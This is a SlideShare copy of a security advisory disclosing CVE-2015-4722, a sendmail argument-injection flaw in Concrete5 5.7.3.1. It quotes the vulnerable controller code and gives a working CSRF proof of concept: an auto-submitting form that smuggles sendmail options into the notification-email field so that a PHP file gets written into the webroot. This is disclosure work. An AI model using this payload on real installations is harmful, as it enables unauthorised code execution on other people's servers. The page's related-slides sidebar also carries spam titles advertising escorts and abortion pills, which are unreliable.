SlideShare une entreprise Scribd logo

Concrete5 Sendmail RCE Advisory

Minded Security
Minded Security

Concrete5 Sendmail Remote Command Execution Advisory

Logiciels
1  sur  4
Télécharger pour lire hors ligne
Edition: 1.0 Last Edit: 24/06/2015 Cassification: Not restricted Sendmail Remote Code Execution Vulnerability in Concrete5 version 5.7.3.1 Author: Egidio Romano
RCE via Sendmail in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 1/3  Summary Vulnerability Class Remote Code Execution (RCE) CVE ID CVE-2015-4722 Remote Yes Local No Published June 6, 2015 Updated June 24, 2015 Credit Egidio Romano Vulnerable Version 5.7.3.1 and probably prior versions Fixed On 5.7.4 Other References https://hackerone.com/reports/59663 http://blog.mindedsecurity.com/2015/06/multiple- security-issues-discovered-in-concrete5-part1.html  Description Concrete5 is vulnerable to a Remote Code Execution because it fails to properly validate certain user input used as sender email address when sending out a registration notification email. This vulnerability is mitigated by the fact that it can be exploited only by authenticated administrator users (even though it could be exploited via a Cross Site Request Forgery attack as well) and only if the email is being sent with sendmail.  Vulnerability Details The vulnerable code is located within the Open::update_registration_type() method: File: /concrete/controllers/single_page/dashboard/system/registration/open.php (lines 13-53): if ($this->isPost()) { Config::save('concrete.user.registration.email_registration', ($this- >post('email_as_username') ? true : false)); Config::save('concrete.user.registration.type', $this- >post('registration_type'));
RCE via Sendmail in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 2/3 Config::save('concrete.user.registration.captcha', ($this- >post('enable_registration_captcha')) ? true : false); switch ($this->post('registration_type')) { case "enabled": Config::save('concrete.user.registration.enabled', true); Config::save('concrete.user.registration.validate_email', false); Config::save('concrete.user.registration.approval', false); Config::save('concrete.user.registration.notification', $this- >post('register_notification')); Config::save( 'concrete.user.registration.notification_email', Loader::helper('security')->sanitizeString( $this->post('register_notification_email'))); … User input passed through the “register_notification_email” POST parameter is not properly sanitized before being stored into a configuration setting (the sanitizeString() method doesn’t check if it is a valid email address). This value is used as a sender email address to send out a notification email when a new user is being registered, and this is done using the PHP mail() function, specifically passing such value to its fifth parameter. So, when sendmail is used to send out such an email, it is possible to alter the command line and tell the sendmail program to log all the email traffic in an arbitrary file chosen by the attacker, resulting in an arbitrary PHP code execution.  Exploitation Details An attacker can leverage a CSRF vulnerability related to the Public Registration Settings to force an authenticated administrator user into browsing to a web page like this: <html> <body> <form method="POST" action="http://[host]/index.php/dashboard/system/registration/open/update_registration_typ e"> <input type="hidden" name="registration_type" value="enabled"> <input type="hidden" name="register_notification" value="1"> <input type="hidden" name="register_notification_email" value="a@b.com - OQueueDirectory=/tmp -X /var/www/concrete5/updates/test.php"> <input type="hidden" name="ccm-submit-registration-type-form" value="Save"> </form><script>document.forms[0].submit()</script> </body> </html>
RCE via Sendmail in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 3/3 When the victim user will browse to this page, the Public Registration Settings will be modified in a way that when a new user will be registered the following command line will be executed to send out a notification email (in case sendmail is used): /usr/sbin/sendmail -t –i –f a@b.com -OQueueDirectory=/tmp -X /var/www/concrete5/updates/test.php This will log all the email traffic into a test.php file located within the /updates/ directory of the Concrete5 webroot (which should be writable by the user running the web server). So the next step for the attacker is to register a new account and put some malicious PHP code after the email address, something like this: When the new account will be created a notification email will be sent, thus the attacker can browse to http://[host]/updates/test.php in order to execute the injected PHP code:

Recommandé

Concrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS AdvisoryConcrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS Advisory
Minded Security
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014
Giorgio Fedon
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Richard Peter Ong
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - Introduction
Knoldus Inc.
 
Overtaking Firefox Profiles: Vulnerabilities in Firefox for Android
Overtaking Firefox Profiles: Vulnerabilities in Firefox for AndroidOvertaking Firefox Profiles: Vulnerabilities in Firefox for Android
Overtaking Firefox Profiles: Vulnerabilities in Firefox for Android
IBM Security
 
Secure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web ApplicationsSecure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web Applications
n|u - The Open Security Community
 
Myths and truths, the untold story of authentication and authorization
Myths and truths, the untold story of authentication and authorizationMyths and truths, the untold story of authentication and authorization
Myths and truths, the untold story of authentication and authorization
Bill GU
 
OAuth 2
OAuth 2OAuth 2
OAuth 2
ChrisWood262
 

Recommandé

Concrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS AdvisoryConcrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS Advisory
Minded Security
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014
Giorgio Fedon
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Richard Peter Ong
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - Introduction
Knoldus Inc.
 
Overtaking Firefox Profiles: Vulnerabilities in Firefox for Android
Overtaking Firefox Profiles: Vulnerabilities in Firefox for AndroidOvertaking Firefox Profiles: Vulnerabilities in Firefox for Android
Overtaking Firefox Profiles: Vulnerabilities in Firefox for Android
IBM Security
 
Secure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web ApplicationsSecure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web Applications
n|u - The Open Security Community
 
Myths and truths, the untold story of authentication and authorization
Myths and truths, the untold story of authentication and authorizationMyths and truths, the untold story of authentication and authorization
Myths and truths, the untold story of authentication and authorization
Bill GU
 
OAuth 2
OAuth 2OAuth 2
OAuth 2
ChrisWood262
 
Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World Bug
Stefano Di Paola
 
Advanced JS Deobfuscation
Advanced JS DeobfuscationAdvanced JS Deobfuscation
Advanced JS Deobfuscation
Minded Security
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!
Luca Carettoni
 
iOS Masque Attack
iOS Masque AttackiOS Masque Attack
iOS Masque Attack
Minded Security
 
Credit Card Fraud - Europe (BCE 2014)
Credit Card Fraud - Europe (BCE 2014)Credit Card Fraud - Europe (BCE 2014)
Credit Card Fraud - Europe (BCE 2014)
Roberto De Sortis - CBCI - QSA
 
Segurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sSegurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`s
Onyo
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
GuardSquare
 
Mobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsMobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, Solutions
Cognizant
 
Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...
owaspindia
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
Denim Group
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS apps
Max Bazaliy
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application Security
Eryk Budi Pratama
 
I Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingI Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security Testing
Jason Haddix
 
The curious case of mobile app security.pptx
The curious case of mobile app security.pptxThe curious case of mobile app security.pptx
The curious case of mobile app security.pptx
Ankit Giri
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
Ajin Abraham
 
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comMobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Idexcel Technologies
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applications
jasonhaddix
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
cclark_isec
 
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Ajin Abraham
 
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
Ajin Abraham
 
Penetration Testing Report
Penetration Testing ReportPenetration Testing Report
Penetration Testing Report
Aman Srivastava
 
Protocol
ProtocolProtocol
Protocol
m_bahba
 

Contenu connexe

En vedette

Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World Bug
Stefano Di Paola
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!
Luca Carettoni
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
GuardSquare
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
Denim Group
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
Ajin Abraham
 

En vedette (20)

Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World Bug
 
Advanced JS Deobfuscation
Advanced JS DeobfuscationAdvanced JS Deobfuscation
Advanced JS Deobfuscation
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!
 
iOS Masque Attack
iOS Masque AttackiOS Masque Attack
iOS Masque Attack
 
Credit Card Fraud - Europe (BCE 2014)
Credit Card Fraud - Europe (BCE 2014)Credit Card Fraud - Europe (BCE 2014)
Credit Card Fraud - Europe (BCE 2014)
 
Segurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sSegurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`s
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
 
Mobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, SolutionsMobile Banking Security: Challenges, Solutions
Mobile Banking Security: Challenges, Solutions
 
Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...Mobile application security – effective methodology, efficient testing! hem...
Mobile application security – effective methodology, efficient testing! hem...
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
 
Reverse Engineering iOS apps
Reverse Engineering iOS appsReverse Engineering iOS apps
Reverse Engineering iOS apps
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application Security
 
I Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security TestingI Want More Ninja – iOS Security Testing
I Want More Ninja – iOS Security Testing
 
The curious case of mobile app security.pptx
The curious case of mobile app security.pptxThe curious case of mobile app security.pptx
The curious case of mobile app security.pptx
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
 
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.comMobile Application Security Testing, Testing for Mobility App | www.idexcel.com
Mobile Application Security Testing, Testing for Mobility App | www.idexcel.com
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applications
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
 
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
 
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
G4H Webcast: Automated Security Analysis of Mobile Applications with Mobile S...
 

Similaire à Concrete5 Sendmail RCE Advisory

Unifi securitybugs sep2013
Unifi securitybugs sep2013Unifi securitybugs sep2013
Unifi securitybugs sep2013
testslidesha12
 
Web PenTest Sample Report
Web PenTest Sample ReportWeb PenTest Sample Report
Web PenTest Sample Report
Octogence
 
RegistrationForm.DS_Store__MACOSXRegistrationForm._.DS_St.docx
RegistrationForm.DS_Store__MACOSXRegistrationForm._.DS_St.docxRegistrationForm.DS_Store__MACOSXRegistrationForm._.DS_St.docx
RegistrationForm.DS_Store__MACOSXRegistrationForm._.DS_St.docx
sodhi3
 

Similaire à Concrete5 Sendmail RCE Advisory (20)

Penetration Testing Report
Penetration Testing ReportPenetration Testing Report
Penetration Testing Report
 
Protocol
ProtocolProtocol
Protocol
 
Advanced xss
Advanced xssAdvanced xss
Advanced xss
 
Pentest Expectations
Pentest ExpectationsPentest Expectations
Pentest Expectations
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
Unifi securitybugs sep2013
Unifi securitybugs sep2013Unifi securitybugs sep2013
Unifi securitybugs sep2013
 
Input validation slides of web application workshop
Input validation slides of web application workshopInput validation slides of web application workshop
Input validation slides of web application workshop
 
Web PenTest Sample Report
Web PenTest Sample ReportWeb PenTest Sample Report
Web PenTest Sample Report
 
Benefits of the CodeIgniter Framework
Benefits of the CodeIgniter FrameworkBenefits of the CodeIgniter Framework
Benefits of the CodeIgniter Framework
 
50063
5006350063
50063
 
SharePoint Saturday - Sandbox development
SharePoint Saturday - Sandbox developmentSharePoint Saturday - Sandbox development
SharePoint Saturday - Sandbox development
 
58615764 net-and-j2 ee-web-services
58615764 net-and-j2 ee-web-services58615764 net-and-j2 ee-web-services
58615764 net-and-j2 ee-web-services
 
Security vulnerabilities of 2015
Security vulnerabilities of 2015Security vulnerabilities of 2015
Security vulnerabilities of 2015
 
RegistrationForm.DS_Store__MACOSXRegistrationForm._.DS_St.docx
RegistrationForm.DS_Store__MACOSXRegistrationForm._.DS_St.docxRegistrationForm.DS_Store__MACOSXRegistrationForm._.DS_St.docx
RegistrationForm.DS_Store__MACOSXRegistrationForm._.DS_St.docx
 
HTML::FormFu talk for Sydney PM
HTML::FormFu talk for Sydney PMHTML::FormFu talk for Sydney PM
HTML::FormFu talk for Sydney PM
 
Simplify your professional web development with symfony
Simplify your professional web development with symfonySimplify your professional web development with symfony
Simplify your professional web development with symfony
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmers
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
Bank One App Sec Training
Bank One App Sec TrainingBank One App Sec Training
Bank One App Sec Training
 
Building Mobile Friendly APIs in Rails
Building Mobile Friendly APIs in RailsBuilding Mobile Friendly APIs in Rails
Building Mobile Friendly APIs in Rails
 

Plus de Minded Security

Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession Learned
Minded Security
 

Plus de Minded Security (12)

Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.
 
Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019
 
Microservices Security: dos and don'ts
Microservices Security: dos and don'tsMicroservices Security: dos and don'ts
Microservices Security: dos and don'ts
 
Live hacking Demo
Live hacking DemoLive hacking Demo
Live hacking Demo
 
Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018
 
Matteo Meucci Isaca Venice - 2017
Matteo Meucci Isaca Venice - 2017Matteo Meucci Isaca Venice - 2017
Matteo Meucci Isaca Venice - 2017
 
BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017
 
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
 
Matteo meucci Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016Matteo meucci Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016
 
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession Learned
 
PHP Object Injection
PHP Object InjectionPHP Object Injection
PHP Object Injection
 

Dernier

AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
VictorSzoltysek
 
The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is inside
shinachiaurasa2
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
Presentation.STUDIO
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
OnePlan Solutions
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
panagenda
 

Dernier (20)

AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 
The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is inside
 
ManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide Deck
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
Pharm-D Biostatistics and Research methodology
Pharm-D Biostatistics and Research methodologyPharm-D Biostatistics and Research methodology
Pharm-D Biostatistics and Research methodology
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
 
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 

Concrete5 Sendmail RCE Advisory

  • 1. Edition: 1.0 Last Edit: 24/06/2015 Cassification: Not restricted Sendmail Remote Code Execution Vulnerability in Concrete5 version 5.7.3.1 Author: Egidio Romano
  • 2. RCE via Sendmail in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 1/3  Summary Vulnerability Class Remote Code Execution (RCE) CVE ID CVE-2015-4722 Remote Yes Local No Published June 6, 2015 Updated June 24, 2015 Credit Egidio Romano Vulnerable Version 5.7.3.1 and probably prior versions Fixed On 5.7.4 Other References https://hackerone.com/reports/59663 http://blog.mindedsecurity.com/2015/06/multiple- security-issues-discovered-in-concrete5-part1.html  Description Concrete5 is vulnerable to a Remote Code Execution because it fails to properly validate certain user input used as sender email address when sending out a registration notification email. This vulnerability is mitigated by the fact that it can be exploited only by authenticated administrator users (even though it could be exploited via a Cross Site Request Forgery attack as well) and only if the email is being sent with sendmail.  Vulnerability Details The vulnerable code is located within the Open::update_registration_type() method: File: /concrete/controllers/single_page/dashboard/system/registration/open.php (lines 13-53): if ($this->isPost()) { Config::save('concrete.user.registration.email_registration', ($this- >post('email_as_username') ? true : false)); Config::save('concrete.user.registration.type', $this- >post('registration_type'));
  • 3. RCE via Sendmail in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 2/3 Config::save('concrete.user.registration.captcha', ($this- >post('enable_registration_captcha')) ? true : false); switch ($this->post('registration_type')) { case "enabled": Config::save('concrete.user.registration.enabled', true); Config::save('concrete.user.registration.validate_email', false); Config::save('concrete.user.registration.approval', false); Config::save('concrete.user.registration.notification', $this- >post('register_notification')); Config::save( 'concrete.user.registration.notification_email', Loader::helper('security')->sanitizeString( $this->post('register_notification_email'))); … User input passed through the “register_notification_email” POST parameter is not properly sanitized before being stored into a configuration setting (the sanitizeString() method doesn’t check if it is a valid email address). This value is used as a sender email address to send out a notification email when a new user is being registered, and this is done using the PHP mail() function, specifically passing such value to its fifth parameter. So, when sendmail is used to send out such an email, it is possible to alter the command line and tell the sendmail program to log all the email traffic in an arbitrary file chosen by the attacker, resulting in an arbitrary PHP code execution.  Exploitation Details An attacker can leverage a CSRF vulnerability related to the Public Registration Settings to force an authenticated administrator user into browsing to a web page like this: <html> <body> <form method="POST" action="http://[host]/index.php/dashboard/system/registration/open/update_registration_typ e"> <input type="hidden" name="registration_type" value="enabled"> <input type="hidden" name="register_notification" value="1"> <input type="hidden" name="register_notification_email" value="a@b.com - OQueueDirectory=/tmp -X /var/www/concrete5/updates/test.php"> <input type="hidden" name="ccm-submit-registration-type-form" value="Save"> </form><script>document.forms[0].submit()</script> </body> </html>
  • 4. RCE via Sendmail in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 3/3 When the victim user will browse to this page, the Public Registration Settings will be modified in a way that when a new user will be registered the following command line will be executed to send out a notification email (in case sendmail is used): /usr/sbin/sendmail -t –i –f a@b.com -OQueueDirectory=/tmp -X /var/www/concrete5/updates/test.php This will log all the email traffic into a test.php file located within the /updates/ directory of the Concrete5 webroot (which should be writable by the user running the web server). So the next step for the attacker is to register a new account and put some malicious PHP code after the email address, something like this: When the new account will be created a notification email will be sent, thus the attacker can browse to http://[host]/updates/test.php in order to execute the injected PHP code: